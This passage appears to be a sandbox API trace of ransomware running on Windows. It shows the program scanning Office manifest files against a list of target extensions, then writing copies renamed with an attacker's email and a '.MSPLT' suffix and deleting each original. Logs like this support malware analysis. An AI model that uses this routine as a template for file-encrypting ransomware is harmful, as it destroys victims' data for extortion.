office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml")) returned 1 [0181.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.704] lstrlenW (lpString=".doc") returned 4 [0181.704] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.705] lstrlenW (lpString=".docx") returned 5 [0181.705] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.705] lstrlenW (lpString=".pdf") returned 4 [0181.705] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.705] lstrlenW (lpString=".xls") returned 4 [0181.705] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.705] lstrlenW (lpString=".xlsx") returned 5 [0181.705] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.705] lstrlenW (lpString=".ppt") returned 4 [0181.705] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.705] lstrlenW (lpString=".zip") returned 4 [0181.705] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.705] lstrlenW (lpString=".rar") returned 4 [0181.705] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.705] lstrlenW (lpString=".bz2") returned 4 [0181.705] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.705] lstrlenW (lpString=".7z") returned 3 [0181.705] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.705] lstrlenW (lpString=".dbf") returned 4 [0181.705] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.705] lstrlenW (lpString=".1cd") returned 4 [0181.705] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.705] lstrlenW (lpString=".jpg") returned 4 [0181.706] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.706] lstrlenW (lpString=".doc") returned 4 [0181.706] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.706] lstrlenW (lpString=".docx") returned 5 [0181.706] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.706] lstrlenW (lpString=".pdf") returned 4 [0181.706] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.706] lstrlenW (lpString=".xls") returned 4 [0181.706] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.706] lstrlenW (lpString=".xlsx") returned 5 [0181.706] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.706] lstrlenW (lpString=".ppt") returned 4 [0181.706] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.706] lstrlenW (lpString=".zip") returned 4 [0181.706] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.706] lstrlenW (lpString=".rar") returned 4 [0181.706] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.706] lstrlenW (lpString=".bz2") returned 4 [0181.706] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.706] lstrlenW (lpString=".7z") returned 3 [0181.706] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.706] lstrlenW (lpString=".dbf") returned 4 [0181.706] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.707] lstrlenW (lpString=".1cd") returned 4 [0181.707] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0181.707] lstrlenW (lpString=".jpg") returned 4 [0181.707] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.707] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0181.707] lstrlenW (lpString="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 53 [0181.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.707] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=14913) returned 1 [0181.708] CloseHandle (hObject=0x378) returned 1 [0181.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml")) returned 0x220 [0181.708] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.708] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.708] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.709] GetLastError () returned 0x0 [0181.709] ReadFile (in: hFile=0x378, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x3a41, lpOverlapped=0x0) returned 1 [0181.783] WriteFile (in: hFile=0x358, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x3a50, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x3a50, lpOverlapped=0x0) returned 1 [0181.785] ReadFile (in: hFile=0x378, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0181.785] WriteFile (in: hFile=0x358, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0181.785] SetEndOfFile (hFile=0x358) returned 1 [0181.785] CloseHandle (hObject=0x358) returned 1 [0181.788] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.788] SetEndOfFile (hFile=0x378) returned 1 [0181.789] CloseHandle (hObject=0x378) returned 1 [0181.789] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0181.790] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml")) returned 1 [0181.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.790] lstrlenW (lpString=".doc") returned 4 [0181.790] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.790] lstrlenW (lpString=".docx") returned 5 [0181.790] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.790] lstrlenW (lpString=".pdf") returned 4 [0181.790] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.790] lstrlenW (lpString=".xls") returned 4 [0181.790] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.790] lstrlenW (lpString=".xlsx") returned 5 [0181.790] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.790] lstrlenW (lpString=".ppt") returned 4 [0181.790] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.790] lstrlenW (lpString=".zip") returned 4 [0181.790] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.790] lstrlenW (lpString=".rar") returned 4 [0181.790] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString=".bz2") returned 4 [0181.791] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString=".7z") returned 3 [0181.791] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.791] lstrlenW (lpString=".dbf") returned 4 [0181.791] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.791] lstrlenW (lpString=".1cd") returned 4 [0181.791] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.791] lstrlenW (lpString=".jpg") returned 4 [0181.791] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.791] lstrlenW (lpString=".doc") returned 4 [0181.791] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString=".docx") returned 5 [0181.791] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0181.791] lstrlenW (lpString=".pdf") returned 4 [0181.791] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString=".xls") returned 4 [0181.791] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString=".xlsx") returned 5 [0181.791] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0181.791] lstrlenW (lpString=".ppt") returned 4 [0181.791] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.791] lstrlenW (lpString=".zip") returned 4 [0181.791] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0181.791] lstrlenW (lpString=".rar") returned 4 [0181.791] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0181.791] lstrlenW (lpString=".bz2") returned 4 [0181.792] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0181.792] lstrlenW (lpString=".7z") returned 3 [0181.792] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0181.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.792] lstrlenW (lpString=".dbf") returned 4 [0181.792] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0181.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.792] lstrlenW (lpString=".1cd") returned 4 [0181.792] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0181.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0181.792] lstrlenW (lpString=".jpg") returned 4 [0181.792] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0181.792] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0181.792] lstrlenW (lpString="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 53 [0181.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.793] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=357349) returned 1 [0181.793] CloseHandle (hObject=0x378) returned 1 [0181.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml")) returned 0x220 [0181.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.793] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.793] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0181.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.793] GetLastError () returned 0x0 [0181.794] ReadFile (in: hFile=0x378, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x573e5, lpOverlapped=0x0) returned 1 [0182.842] WriteFile (in: hFile=0x358, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x573f0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x573f0, lpOverlapped=0x0) returned 1 [0182.851] ReadFile (in: hFile=0x378, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0182.851] WriteFile (in: hFile=0x358, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0182.851] SetEndOfFile (hFile=0x358) returned 1 [0182.851] CloseHandle (hObject=0x358) returned 1 [0182.864] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0182.865] SetEndOfFile (hFile=0x378) returned 1 [0182.869] CloseHandle (hObject=0x378) returned 1 [0182.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0182.870] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml")) returned 1 [0182.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.870] lstrlenW (lpString=".doc") returned 4 [0182.870] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.870] lstrlenW (lpString=".docx") returned 5 [0182.870] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.870] lstrlenW (lpString=".pdf") returned 4 [0182.870] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.870] lstrlenW (lpString=".xls") returned 4 [0182.870] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.870] lstrlenW (lpString=".xlsx") returned 5 [0182.871] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.871] lstrlenW (lpString=".ppt") returned 4 [0182.871] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.871] lstrlenW (lpString=".zip") returned 4 [0182.871] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.871] lstrlenW (lpString=".rar") returned 4 [0182.871] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.871] lstrlenW (lpString=".bz2") returned 4 [0182.871] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.871] lstrlenW (lpString=".7z") returned 3 [0182.871] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.871] lstrlenW (lpString=".dbf") returned 4 [0182.871] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.871] lstrlenW (lpString=".1cd") returned 4 [0182.871] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.871] lstrlenW (lpString=".jpg") returned 4 [0182.871] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.871] lstrlenW (lpString=".doc") returned 4 [0182.871] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0182.871] lstrlenW (lpString=".docx") returned 5 [0182.871] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0182.872] lstrlenW (lpString=".pdf") returned 4 [0182.872] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0182.872] lstrlenW (lpString=".xls") returned 4 [0182.872] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0182.872] lstrlenW (lpString=".xlsx") returned 5 [0182.872] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0182.872] lstrlenW (lpString=".ppt") returned 4 [0182.872] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0182.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.872] lstrlenW (lpString=".zip") returned 4 [0182.872] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0182.872] lstrlenW (lpString=".rar") returned 4 [0182.872] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0182.872] lstrlenW (lpString=".bz2") returned 4 [0182.872] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0182.872] lstrlenW (lpString=".7z") returned 3 [0182.872] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0182.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0182.872] lstrlenW (lpString=".dbf") returned 4 [0182.872] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0182.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0183.458] lstrlenW (lpString=".1cd") returned 4 [0183.459] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0183.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 104 [0183.459] lstrlenW (lpString=".jpg") returned 4 [0183.459] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0183.459] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0183.459] lstrlenW (lpString="AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 53 [0183.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.460] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=1261) returned 1 [0183.460] CloseHandle (hObject=0x384) returned 1 [0183.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml")) returned 0x220 [0183.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0183.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0183.460] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.460] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0183.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.461] GetLastError () returned 0x0 [0183.461] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x4ed, lpOverlapped=0x0) returned 1 [0183.463] WriteFile (in: hFile=0x378, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, 